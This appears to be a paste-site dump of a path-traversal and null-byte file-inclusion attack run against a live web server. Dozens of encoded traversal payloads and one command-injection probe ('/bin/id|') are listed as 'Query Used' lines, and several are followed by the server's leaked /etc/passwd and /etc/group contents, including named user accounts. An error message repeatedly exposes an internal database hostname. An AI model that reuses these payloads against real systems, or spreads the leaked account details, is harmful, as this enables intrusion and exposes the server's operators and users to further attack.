- <b>Query Used: ..\%20\..\%20\..\%20\etc/passwd%00.php.inc</b>.<b>Query Used: ..\..\..\..\..\..\..\..\..\..\etc\passwd%00.php.inc</b>.<b>Query Used: ../../../../../../../../../../etc/passwd%00.php.inc</b>.<b>Query Used: ../../../../../../../../../../etc/hosts%00.php.inc</b>.<b>Query Used: ..\..\..\..\..\..\..\..\..\..\etc\group%00.php.inc</b>.<b>Query Used: .\./.\./.\./.\./.\./.\./etc/shadow%00.php.inc</b>.<b>Query Used: /%00.php.inc</b>Array
- (
- [0] => Could not connect to host server: mysqlread.md.nids.noaa.gov
- Too many connections
- )
- <b>Query Used: %00/%00.php.inc</b><b>Query Used: %2A%00.php.inc</b>.<b>Query Used: /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00.php.inc</b>root:x:0:0:root:/root:/bin/bash
- bin:x:1:1:bin:/bin:/sbin/nologin
- daemon:x:2:2:daemon:/sbin:/sbin/nologin
- adm:x:3:4:adm:/var/adm:/sbin/nologin
- lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
- sync:x:5:0:sync:/sbin:/bin/sync
- shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
- halt:x:7:0:halt:/sbin:/sbin/halt
- mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
- uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
- operator:x:11:0:operator:/root:/sbin/nologin
- games:x:12:100:games:/usr/games:/sbin/nologin
- gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
- ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
- nobody:x:99:99:Nobody:/:/sbin/nologin
- dbus:x:81:81:System message bus:/:/sbin/nologin
- vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
- rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
- abrt:x:499:499::/etc/abrt:/sbin/nologin
- saslauth:x:498:498:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
- mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
- smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
- haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
- ntp:x:38:38::/etc/ntp:/sbin/nologin
- rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
- nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
- apache:x:48:48:Apache:/var/www:/sbin/nologin
- webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
- sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
- postfix:x:89:89::/var/spool/postfix:/sbin/nologin
- tcpdump:x:72:72::/:/sbin/nologin
- cmccan:x:500:500:cmccan:/home/cmccan:/bin/bash
- darnold:x:501:501:darnold:/home/darnold:/bin/bash
- kmars:x:503:503:kmars:/home/kmars:/bin/bash
- zabbix:x:309:309:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologin
- clamav:x:311:311:Clamav scanner user:/home/clamav:/sbin/nologin
- clamupdate:x:312:312:Clamav database update user:/var/lib/clamav:/sbin/nologin
- clam:x:308:308:Clam Anti Virus Checker:/var/clamav:/sbin/nologin
- mstrydom:x:533:533:Malcolm Strydom:/home/mstrydom:/bin/bash
- forecast:x:302:302:Forecast System Account:/vol/forecast:/sbin/nologin
- ahps:x:303:303:AHPS System Account:/vol/ahps:/sbin/nologin
- nwschat:x:320:320:NWSChat System Account:/home/nwschat:/sbin/nologin
- nscanner:x:424:424:Nessus Scanner:/home/nscanner:/bin/bash
- memcached:x:301:301:Memcached daemon:/var/run/memcached:/sbin/nologin
- <b>Query Used: /////etc/passwd%00.php.inc</b>root:x:0:0:root:/root:/bin/bash
- bin:x:1:1:bin:/bin:/sbin/nologin
- daemon:x:2:2:daemon:/sbin:/sbin/nologin
- adm:x:3:4:adm:/var/adm:/sbin/nologin
- lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
- sync:x:5:0:sync:/sbin:/bin/sync
- shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
- halt:x:7:0:halt:/sbin:/sbin/halt
- mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
- uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
- operator:x:11:0:operator:/root:/sbin/nologin
- games:x:12:100:games:/usr/games:/sbin/nologin
- gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
- ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
- nobody:x:99:99:Nobody:/:/sbin/nologin
- dbus:x:81:81:System message bus:/:/sbin/nologin
- vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
- rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
- abrt:x:499:499::/etc/abrt:/sbin/nologin
- saslauth:x:498:498:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
- mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
- smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
- haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
- ntp:x:38:38::/etc/ntp:/sbin/nologin
- rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
- nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
- apache:x:48:48:Apache:/var/www:/sbin/nologin
- webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
- sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
- postfix:x:89:89::/var/spool/postfix:/sbin/nologin
- tcpdump:x:72:72::/:/sbin/nologin
- cmccan:x:500:500:cmccan:/home/cmccan:/bin/bash
- darnold:x:501:501:darnold:/home/darnold:/bin/bash
- kmars:x:503:503:kmars:/home/kmars:/bin/bash
- zabbix:x:309:309:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologin
- clamav:x:311:311:Clamav scanner user:/home/clamav:/sbin/nologin
- clamupdate:x:312:312:Clamav database update user:/var/lib/clamav:/sbin/nologin
- clam:x:308:308:Clam Anti Virus Checker:/var/clamav:/sbin/nologin
- mstrydom:x:533:533:Malcolm Strydom:/home/mstrydom:/bin/bash
- forecast:x:302:302:Forecast System Account:/vol/forecast:/sbin/nologin
- ahps:x:303:303:AHPS System Account:/vol/ahps:/sbin/nologin
- nwschat:x:320:320:NWSChat System Account:/home/nwschat:/sbin/nologin
- nscanner:x:424:424:Nessus Scanner:/home/nscanner:/bin/bash
- memcached:x:301:301:Memcached daemon:/var/run/memcached:/sbin/nologin
- <b>Query Used: /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/group%00.php.inc</b>root:x:0:root
- bin:x:1:root,bin,daemon
- daemon:x:2:root,bin,daemon
- sys:x:3:root,bin,adm
- adm:x:4:root,adm,daemon
- tty:x:5:
- disk:x:6:root
- lp:x:7:daemon,lp
- mem:x:8:
- kmem:x:9:
- wheel:x:10:root
- mail:x:12:mail,postfix
- uucp:x:14:uucp
- man:x:15:
- games:x:20:
- gopher:x:30:
- video:x:39:
- dip:x:40:
- ftp:x:50:
- lock:x:54:
- audio:x:63:
- nobody:x:99:
- users:x:100:
- dbus:x:81:
- utmp:x:22:
- utempter:x:35:
- floppy:x:19:
- vcsa:x:69:
- rpc:x:32:
- abrt:x:499:
- cdrom:x:11:
- tape:x:33:
- dialout:x:18:
- saslauth:x:498:
- mailnull:x:47:
- smmsp:x:51:
- haldaemon:x:68:haldaemon
- ntp:x:38:
- rpcuser:x:29:
- nfsnobody:x:65534:
- apache:x:48:
- webalizer:x:67:
- sshd:x:74:
- postdrop:x:90:
- postfix:x:89:
- tcpdump:x:72:
- slocate:x:21:
- stapdev:x:497:
- stapusr:x:496:
- sysadmin:x:401:cmccan,darnold,kmars,mstrydom,nscanner
- cmccan:x:500:
- darnold:x:501:
- kmars:x:503:
- zabbix:x:309:
- clamav:x:311:
- clamupdate:x:312:
- clam:x:308:
- cgred:x:504:
- mstrydom:x:533:
- forecast:x:302:
- ahps:x:303:
- nwschat:x:320:
- nscanner:x:424:
- memcached:x:301:
- stapsys:x:157:
- <b>Query Used: /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00.php.inc</b>root:x:0:0:root:/root:/bin/bash
- bin:x:1:1:bin:/bin:/sbin/nologin
- daemon:x:2:2:daemon:/sbin:/sbin/nologin
- adm:x:3:4:adm:/var/adm:/sbin/nologin
- lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
- sync:x:5:0:sync:/sbin:/bin/sync
- shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
- halt:x:7:0:halt:/sbin:/sbin/halt
- mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
- uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
- operator:x:11:0:operator:/root:/sbin/nologin
- games:x:12:100:games:/usr/games:/sbin/nologin
- gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
- ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
- nobody:x:99:99:Nobody:/:/sbin/nologin
- dbus:x:81:81:System message bus:/:/sbin/nologin
- vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
- rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
- abrt:x:499:499::/etc/abrt:/sbin/nologin
- saslauth:x:498:498:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
- mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
- smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
- haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
- ntp:x:38:38::/etc/ntp:/sbin/nologin
- rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
- nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
- apache:x:48:48:Apache:/var/www:/sbin/nologin
- webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
- sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
- postfix:x:89:89::/var/spool/postfix:/sbin/nologin
- tcpdump:x:72:72::/:/sbin/nologin
- cmccan:x:500:500:cmccan:/home/cmccan:/bin/bash
- darnold:x:501:501:darnold:/home/darnold:/bin/bash
- kmars:x:503:503:kmars:/home/kmars:/bin/bash
- zabbix:x:309:309:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologin
- clamav:x:311:311:Clamav scanner user:/home/clamav:/sbin/nologin
- clamupdate:x:312:312:Clamav database update user:/var/lib/clamav:/sbin/nologin
- clam:x:308:308:Clam Anti Virus Checker:/var/clamav:/sbin/nologin
- mstrydom:x:533:533:Malcolm Strydom:/home/mstrydom:/bin/bash
- forecast:x:302:302:Forecast System Account:/vol/forecast:/sbin/nologin
- ahps:x:303:303:AHPS System Account:/vol/ahps:/sbin/nologin
- nwschat:x:320:320:NWSChat System Account:/home/nwschat:/sbin/nologin
- nscanner:x:424:424:Nessus Scanner:/home/nscanner:/bin/bash
- memcached:x:301:301:Memcached daemon:/var/run/memcached:/sbin/nologin
- <b>Query Used: /'%00.php.inc</b>.<b>Query Used: /\,%ENV\,/%00.php.inc</b>.<b>Query Used: /etc/passwd%00.php.inc</b>.<b>Query Used: /etc/passwd%00.php.inc</b>.<b>Query Used: /.....%0a%00.php.inc</b>.<b>Query Used: ..%2f%2f..%2f%2f..%2f%2f..%2f%2f..%2f%2f..%2f%2fetc%2f%2fpasswd%00.php.inc</b>root:x:0:0:root:/root:/bin/bash
- bin:x:1:1:bin:/bin:/sbin/nologin
- daemon:x:2:2:daemon:/sbin:/sbin/nologin
- adm:x:3:4:adm:/var/adm:/sbin/nologin
- lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
- sync:x:5:0:sync:/sbin:/bin/sync
- shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
- halt:x:7:0:halt:/sbin:/sbin/halt
- mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
- uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
- operator:x:11:0:operator:/root:/sbin/nologin
- games:x:12:100:games:/usr/games:/sbin/nologin
- gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
- ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
- nobody:x:99:99:Nobody:/:/sbin/nologin
- dbus:x:81:81:System message bus:/:/sbin/nologin
- vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
- rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
- abrt:x:499:499::/etc/abrt:/sbin/nologin
- saslauth:x:498:498:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
- mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
- smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
- haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
- ntp:x:38:38::/etc/ntp:/sbin/nologin
- rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
- nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
- apache:x:48:48:Apache:/var/www:/sbin/nologin
- webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
- sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
- postfix:x:89:89::/var/spool/postfix:/sbin/nologin
- tcpdump:x:72:72::/:/sbin/nologin
- cmccan:x:500:500:cmccan:/home/cmccan:/bin/bash
- darnold:x:501:501:darnold:/home/darnold:/bin/bash
- kmars:x:503:503:kmars:/home/kmars:/bin/bash
- zabbix:x:309:309:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologin
- clamav:x:311:311:Clamav scanner user:/home/clamav:/sbin/nologin
- clamupdate:x:312:312:Clamav database update user:/var/lib/clamav:/sbin/nologin
- clam:x:308:308:Clam Anti Virus Checker:/var/clamav:/sbin/nologin
- mstrydom:x:533:533:Malcolm Strydom:/home/mstrydom:/bin/bash
- forecast:x:302:302:Forecast System Account:/vol/forecast:/sbin/nologin
- ahps:x:303:303:AHPS System Account:/vol/ahps:/sbin/nologin
- nwschat:x:320:320:NWSChat System Account:/home/nwschat:/sbin/nologin
- nscanner:x:424:424:Nessus Scanner:/home/nscanner:/bin/bash
- memcached:x:301:301:Memcached daemon:/var/run/memcached:/sbin/nologin
- <b>Query Used: /etc/passwd^^%00.php.inc</b>Array
- (
- [0] => Could not connect to host server: mysqlread.md.nids.noaa.gov
- Too many connections
- )
- <b>Query Used: /etc/group%00.php.inc</b>Array
- (
- [0] => Could not connect to host server: mysqlread.md.nids.noaa.gov
- Too many connections
- )
- <b>Query Used: \\\\\\\etc/\passwd%00.php.inc</b>.<b>Query Used: /etc/shadow^^%00.php.inc</b>.<b>Query Used: /bin/id|%00.php.inc</b>Array
- (
- [0] => Could not connect to host server: mysqlread.md.nids.noaa.gov
- Too many connections
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement